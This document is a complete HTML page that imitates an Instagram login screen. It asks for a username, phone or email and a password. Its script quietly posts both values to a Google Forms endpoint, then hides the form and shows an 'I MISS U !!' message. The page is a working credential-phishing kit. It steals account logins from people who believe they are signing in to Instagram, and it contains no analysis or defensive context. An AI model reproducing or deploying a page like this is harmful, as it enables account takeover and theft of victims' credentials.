<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

<style>
body {font-family: Arial, Helvetica, sans-serif;}
form {border: 3px solid #f1f1f1;}

input[type=text], input[type=email],input[type=password], select {
  width: 49%;
  font-size:20px;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
}

button {
  background-color: #4CAF50;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
}

button:hover {
  opacity: 0.8;
}

.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
}

img.avatar {
  width: 20%;
  border-radius: 50%;
}

.container {
  padding: 16px;
}

span.psw {
  float: right;
  padding-top: 16px;
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
</style>
</head>
<body style="background:#000;">

<center><h1 style="color:#fff">Enter  Instagram details:
<form id="form" target="_self" onsubmit="return postToGoogle();" action="" autocomplete="off"> 
<input id="nameField" name="entry.820358538" placeholder="Phone no,username,email" type="text" required> 
<!--<input id="emailField" name="entry.1460631936" placeholder="Enter your email" type="email" required> -->
<br><input id="mobField" name="entry.608667607" placeholder="enter password" type="password" required>  
<!--
<select id="cinema" name="entry.1878256062" placeholder="Select Cinema" required>

<option value="">Why wanTED Talks Youtube Channel?</option>
<option value="City: Delhi, Cinema: PVR Logix City Centre IMAX, Noida">Time Saving Fast Track Tutorials</option>
<option value="City:Bengaluru  Cinema:Cinepolis IMAX Forum Shantiniketan">Provide Code for reference</option>
<option value="City:Chennai Cinema:SPI Palazo The Forum Vijaya Mall, Vadapalani">Instant Replies of Comments</option>
<option value="City:Pune Cinema:Cinepolis Westend Mall, Pune">Latest Code Updates</option> 
</select>  -->
<button id="send" type="submit" class="common_btn">LOGIN</button>
</form>

<h3 id="success-msg" style="text-align: center !important; margin-top:190px !important; display:none; color:#fff">I MISS U !!</h3>




<script>
function postToGoogle() {
                var field1 = $("#nameField").val();
                var field3 = $("#mobField").val();
                 				
				if(field1 == ""){
					alert('Please Fill Your Name');
					document.getElementById("nameField").focus();
					return false;
				}
				
				if(field3 == "" ){
					alert('Please enter password');
					document.getElementById("mobField").focus();
					return false;
				}


				
	
                $.ajax({
                    url: "https://docs.google.com/forms/d/e/1FAIpQLSetSLWIXWkNdg0y920Yne1Ze4IQQjmAnRPX6rBd0HLX50rQAQ/formResponse?",
					

          data: {"entry.820358538": field1, "entry.608667607": field3,},
                    type: "POST",
                    dataType: "xml",
                    success: function(d)
					{
					},
					error: function(x, y, z)
						{

							$('#success-msg').show();
							$('#form').hide();
							
						}
                });
				return false;
            }
</script>
</body>
</html>
